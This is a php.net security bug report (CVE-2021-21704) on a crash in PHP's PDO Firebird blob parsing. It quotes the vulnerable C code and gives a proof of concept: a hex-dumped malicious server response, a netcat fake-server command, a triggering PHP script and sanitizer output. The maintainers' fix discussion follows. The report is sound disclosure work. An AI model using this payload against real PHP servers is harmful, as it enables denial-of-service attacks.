php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #76452 Crash while parsing blob data in firebird_fetch_blob
Submitted: 2018-06-11 20:17 UTC Modified: 2021-06-28 04:40 UTC
From: trichimtrich at gmail dot com Assigned: stas (profile)
Status: Closed Package: PDO Firebird
PHP Version: 7.3.0alpha1 OS:
Private report: No CVE-ID: 2021-21704
 [2018-06-11 20:17 UTC] trichimtrich at gmail dot com
Description:
------------
A bug in pdo_firebase module allows a malicious firebase server or
man-in-the-middle attacker to crash PHP.

The length in response can set to -1 to make PHP crash.
Vulnerable code in:
\php-src\ext\pdo_firebird\firebird_statement.c:281
281: 		item_len = (unsigned short) isc_vax_integer(&bl_info[i], 2);
282: 
283: 		if (item == isc_info_blob_total_length) {
284: 			*len = isc_vax_integer(&bl_info[i+2], item_len);
285: 			break;
286: 		}
287: 		i += item_len+2;
288: 	}
289: 
290: 	/* we've found the blob's length, now fetch! */
291: 
292: 	if (*len) {
293: 		zend_ulong cur_len;
294: 		unsigned short seg_len;
295: 		ISC_STATUS stat;
296: 
297: 		*ptr = S->fetch_buf[colno] = erealloc(*ptr, *len+1);
298: 
299: 		for (cur_len = stat = 0; (!stat || stat == isc_segment) && cur_len < *len; cur_len += seg_len) {
300: 
301: 			unsigned short chunk_size = (*len-cur_len) > USHRT_MAX ? USHRT_MAX
302: 				: (unsigned short)(*len-cur_len);
303: 
304: 			stat = isc_get_segment(H->isc_status, &blobh, &seg_len, chunk_size, &(*ptr)[cur_len]);
305: 		}
306: 
307: 		(*ptr)[*len++] = '\0';


$ ./php --version
PHP 7.3.0-dev (cli) (built: Jun  9 2018 04:47:18) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.3.0-dev, Copyright (c) 1998-2018 Zend Technologies

Test script:
---------------
$ xxd stmt_blob.bin
00000000: 0000 005e ffff 800f 0000 0001 0000 0005  ...^............
00000010: 0000 0000 0000 000b 4c65 6761 6379 5f41  ........Legacy_A
00000020: 7574 6800 0000 0000 0000 0000 0000 005c  uth............\
00000030: 0000 0000 0000 000b 4c65 6761 6379 5f41  ........Legacy_A
00000040: 7574 6800 0000 0000 0000 0000 0000 0009  uth.............
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: 0000 0001 0000 0000 0000 0000 0000 0009  ................
00000070: 0000 0001 0000 0000 0000 0000 0000 0000  ................
00000080: 0000 0001 0000 0000 0000 0000 0000 0009  ................
00000090: 0000 0002 0000 0000 0000 0000 0000 0000  ................
000000a0: 0000 0001 0000 0000 0000 0000 0000 0009  ................
000000b0: 0000 0004 0000 0000 0000 0000 0000 00a1  ................
000000c0: 1504 0001 0000 001b 0400 0300 0000 0507  ................
000000d0: 0400 0000 0000 0407 0400 0200 0000 0904  ................
000000e0: 0001 0000 000b 0400 c101 0000 0c04 0000  ................
000000f0: 0000 000d 0400 0000 0000 0e04 0032 0000  .............2..
00000100: 0010 0300 4141 4111 0400 5445 5354 1206  ....AAA...TEST..
00000110: 0053 5953 4442 4113 0300 4141 4108 0904  .SYSDBA...AAA...
00000120: 0002 0000 000b 0400 0902 0000 0c04 0000  ................
00000130: 0000 000d 0400 0000 0000 0e04 0008 0000  ................
00000140: 0010 0400 4242 4242 1104 0054 4553 5412  ....BBBB...TEST.
00000150: 0600 5359 5344 4241 1304 0042 4242 4208  ..SYSDBA...BBBB.
00000160: 0100 0000 0000 0001 0000 0000 0000 0000  ................
00000170: 0000 0009 0000 0001 0000 0000 0000 0000  ................
00000180: 0000 0000 0000 0001 0000 0000 0000 0000  ................
00000190: 0000 0009 0000 0000 0000 0000 0000 0000  ................
000001a0: 0000 0000 0000 0001 0000 0000 0000 0000  ................
000001b0: 0000 0042 0000 0000 0000 0001 0000 0000  ...B............
000001c0: 0000 0004 6869 6869 0000 008b 0000 0000  ....hihi........
000001d0: 0000 0042 0000 0000 0000 0001 0000 0000  ...B............
000001e0: 0000 0005 6869 6869 3200 0000 0000 008b  ....hihi2.......
000001f0: 0000 0001 0000 0042 0000 0000 0000 0001  .......B........
00000200: 0000 0000 0000 0005 6869 6869 3200 0000  ........hihi2...
00000210: 0000 008b 0000 0002 0000 0042 0000 0000  ...........B....
00000220: 0000 0001 0000 0000 0000 0005 6869 6869  ............hihi
00000230: 3200 0000 0000 008b 0000 0003 0000 0042  2..............B
00000240: 0000 0064 0000 0000 0000 0009 0000 0003  ...d............
00000250: 0000 0000 0000 0000 0000 0000 0000 0001  ................
00000260: 0000 0000 0000 0000 0000 0009 0000 0003  ................
00000270: 0000 0000 0000 0000 0000 0008 0604 00ff  ................
00000280: ffff ff01 0000 0001 0000 0000 0000 0000  ................
00000290: 0000 0009 0000 0002 0000 0000 0000 0000  ................
000002a0: 0000 0005 0300 3132 3300 0000 0000 0001  ......123.......
000002b0: 0000 0000 0000 0000 0000 0009 0000 0000  ................
000002c0: 0000 0000 0000 0000 0000 0000 0000 0001  ................
000002d0: 0000 0000 0000 0000 0000 0009 0000 0002  ................
000002e0: 0000 0000 0000 0000 0000 0000 0000 0001  ................
000002f0: 0000 0000 0000 0000 0000 0009 ffff ffff  ................
00000300: 0000 0000 0000 0000 0000 0000 0000 0001  ................
00000310: 0000 0000 0000 0000 0000 0009 0000 0000  ................
00000320: 0000 0000 0000 0000 0000 0000 0000 0001  ................
00000330: 0000 0000 0000 0000 0000 0009 0000 0000  ................
00000340: 0000 0000 0000 0000 0000 0000 0000 0001  ................
00000350: 0000 0000 0000 0000                      ........


$ nc -lvp 3050 < stmt_blob.bin


$ cat fire_stmt_blob.php
<?php
$dsn = 'firebird:dbname=localhost:employee;charset=utf8;';
$username = 'SYSDBA';
$password = 'masterkey';

$dbh = new PDO($dsn, $username, $password, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$sql = "select * from test";
$query = $dbh->prepare($sql);
$query->execute();
var_dump($query->fetch());
?>


Expected result:
----------------
No crash

Actual result:
--------------
$ ./php fire_stmt_blob.php
=================================================================
==5574==ERROR: AddressSanitizer: negative-size-param: (size=-1)
    #0 0x4ce057 in __asan_memcpy /scratch/llvm/clang-4/xenial/final/llvm.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:453:3
    #1 0xcd44b1 in fetch_value (/mnt/hgfs/share/htdocs/php+0xcd44b1)
    #2 0xccd658 in do_fetch (/mnt/hgfs/share/htdocs/php+0xccd658)
    #3 0xcc605c in zim_PDOStatement_fetch (/mnt/hgfs/share/htdocs/php+0xcc605c)
    #4 0x12e2d9f in ZEND_DO_FCALL_SPEC_RETVAL_USED_HANDLER (/mnt/hgfs/share/htdocs/php+0x12e2d9f)
    #5 0x1212bcf in execute_ex (/mnt/hgfs/share/htdocs/php+0x1212bcf)
    #6 0x121320b in zend_execute (/mnt/hgfs/share/htdocs/php+0x121320b)
    #7 0x11175c0 in zend_execute_scripts (/mnt/hgfs/share/htdocs/php+0x11175c0)
    #8 0xfa4878 in php_execute_script (/mnt/hgfs/share/htdocs/php+0xfa4878)
    #9 0x1412cc4 in do_cli (/mnt/hgfs/share/htdocs/php+0x1412cc4)
    #10 0x1410e67 in main (/mnt/hgfs/share/htdocs/php+0x1410e67)
    #11 0x7f05cd17382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #12 0x43d878 in _start (/mnt/hgfs/share/htdocs/php+0x43d878)

Address 0x7f05c7a87010 is a wild pointer.
SUMMARY: AddressSanitizer: negative-size-param /scratch/llvm/clang-4/xenial/final/llvm.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:453:3 in __asan_memcpy
==5574==ABORTING

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2018-06-20 04:09 UTC] stas@php.net
-Assigned To: +Assigned To: lwe
 [2018-06-28 08:31 UTC] trichimtrich at gmail dot com
any update for this one?
 [2021-04-30 14:23 UTC] cmb@php.net
-Status: Assigned +Status: Verified -Assigned To: lwe +Assigned To: cmb
 [2021-05-05 10:54 UTC] cmb@php.net
-Assigned To: cmb +Assigned To: stas
 [2021-05-05 10:54 UTC] cmb@php.net
Suggested patch:
<https://gist.github.com/cmb69/bbf45c1f420fcc16a98d2a9614db8729>.

This requires the payload server[1], and is developed against
PHP-7.4.  For PHP-7.3 at least some adjustments need to be done.
I can do that, but first would like to confirm that the patch and
the testing "framework" are generally acceptable.

Stas, what do you think?

[1] <https://github.com/php/php-src/pull/6940>
 [2021-06-21 04:54 UTC] stas@php.net
@cmb I think we may want to use safe_erealloc here?
 [2021-06-21 05:10 UTC] stas@php.net
-CVE-ID: +CVE-ID: 2021-21704
 [2021-06-21 06:22 UTC] stas@php.net
-Private report: No +Private report: Yes
 [2021-06-28 04:41 UTC] git@php.net
Automatic comment on behalf of cmb69 (author) and smalyshev (committer)
Revision: https://github.com/php/php-src/commit/286162e9b03071c4308e7e92597bca4239f49d89
Log: Fix #76452: Crash while parsing blob data in firebird_fetch_blob
 [2021-06-28 04:41 UTC] git@php.net
-Status: Verified +Status: Closed
 
PHP Copyright © 2001-2021 The PHP Group
All rights reserved.
Last updated: Fri Jul 30 17:01:23 2021 UTC